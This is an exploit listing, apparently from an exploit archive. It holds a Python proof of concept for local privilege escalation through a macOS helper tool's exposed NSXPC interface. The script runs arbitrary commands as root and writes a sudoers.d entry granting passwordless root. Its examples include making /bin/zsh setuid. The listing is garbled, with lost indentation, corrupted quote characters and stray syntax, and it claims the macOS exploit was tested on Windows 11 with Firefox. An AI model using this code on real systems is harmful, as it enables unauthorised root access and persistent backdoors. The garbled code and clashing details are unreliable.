Share
## https://sploitus.com/exploit?id=PACKETSTORM:219877
==================================================================================================================================
    | # Title     : Vienna Assistant 1.2.542 macOS NSXPC HelperTool Interface Abuse Leading to Potential Privilege Escalation        |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://www.vsl.co.at/                                                                                           |
    ==================================================================================================================================
    
    [+] Summary    : A macOS helper service interface implemented via NSXPC was observed exposing methods that may allow privileged operations such as file writing and command execution through a remote proxy connection.
    
    [+] POC        :  
    
    #!/usr/bin/env python3
    
    import objc
    from Foundation import *
    import sys
    import os
    
    objc.loadBundle('Foundation', globals(), '/System/Library/Frameworks/Foundation.framework')
    
    class HelperToolProtocol(objc.protocolNamed('HelperToolProtocol')): 
    pass. pass
    
    class ExploitClient: 
    def __init__(self): 
    self. connection = None 
    
    def connect(self): 
    โ€œContact HelperToolโ€ 
    try: 
    self.connection = NSXPCConnection.alloc().initWithMachServiceName_options_( 
    "com.vsl.HelperTool", 0 
    ) 
    self.connection.setRemoteObjectInterface_( 
    NSXPCInterface.interfaceWithProtocol_(HelperToolProtocol) 
    ) 
    self.connection.resume() 
    
    if self.connection is None: 
    print("[-] Connection object is None") 
    return False 
    
    print("[+] Connected to HelperTool service") 
    return True 
    except Exception as e: 
    print(f"[-] Connection failed: {e}") 
    return False 
    
    def write_file(self, path, content): 
    โ€œWrite a file anywhere as root.โ€ 
    try: 
    if not self.connection: 
    print("[-] No active connection") 
    return False 
    
    remote = self.connection.remoteObjectProxy() 
    data = content.encode('utf-8') 
    nsdata = NSData.dataWithBytes_length_(data, len(data)) 
    
    if not remote: 
    print("[-] Remote proxy unavailable") 
    return False 
    
    remote.writeReceiptFile_withData_withReply_(path, nsdata, lambda error: None) 
    print(f"[+] File written: {path}") 
    return True 
    except Exception as e: 
    print(f"[-] Failed to write file: {e}") 
    return False 
    
    def execute_command(self, command, args=None): 
    "Execute command as root" 
    if args is None: 
    args = [] 
    
    if not self.connection: 
    print("[-] No active connection") 
    return False 
    
    nsargs = NSMutableArray.array() 
    for arg in args: 
    nsargs.addObject_(arg) 
    
    try: 
    remote = self.connection.remoteObjectProxy() 
    
    if not remote: 
    print("[-] Remote proxy unavailable") 
    return False 
    
    remote.runUninstaller_withArgs_withReply_(command, nsargs, lambda error: None) 
    print(f"[+] Command executed: {command} {' '.join(args)}") 
    return True 
    except Exception as e: 
    print(f"[-] Command execution failed: {e}") 
    return False
    
    def main(): 
    print("=" * 60) 
    print("CVE-2026-24068 - Vienna Assistant Privilege Escalation") 
    print("macOS Local Privilege Escalation Exploit") 
    print("=" * 60) 
    print() 
    
    if len(sys.argv) < 2: 
    print(f"Usage: {sys.argv[0]} <command> [args...]") 
    print() 
    print("Examples:") 
    print(f" {sys.argv[0]} /bin/bash -c 'id > /tmp/test.txt'") 
    print(f" {sys.argv[0]} /usr/bin/whoami") 
    print(f" {sys.argv[0]} /bin/bash -c 'chmod 4755 /bin/zsh'") 
    sys. exit(1) 
    
    client = ExploitClient() 
    if not client.connect(): 
    print("[-] Failed to connect. Is Vienna Assistant installed?") 
    sys. exit(1) 
    
    command = sys.argv[1] 
    args = sys.argv[2:] if len(sys.argv) > 2 else [] 
    
    print(f"[*] Executing: {command} {' '.join(args)}") 
    client.execute_command(command, args) 
    
    print("\n[*] Attempting additional exploitation methods...") 
    current_user = os.environ.get('USER') or "attacker" 
    
    sudoers = f"{current_user} ALL=(ALL) NOPASSWD: ALL\n" 
    client.write_file(f"/etc/sudoers.d/{current_user}", sudoers) 
    
    client.write_file("/tmp/vienna_exploited.txt", "Vienna Assistant CVE-2026-24068 exploited successfully!\n") 
    
    print("\n[+] Exploit completed!") 
    print("[*] Verification: cat /tmp/vienna_exploited.txt")
    
    
    if __name__ == "__main__": 
    main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================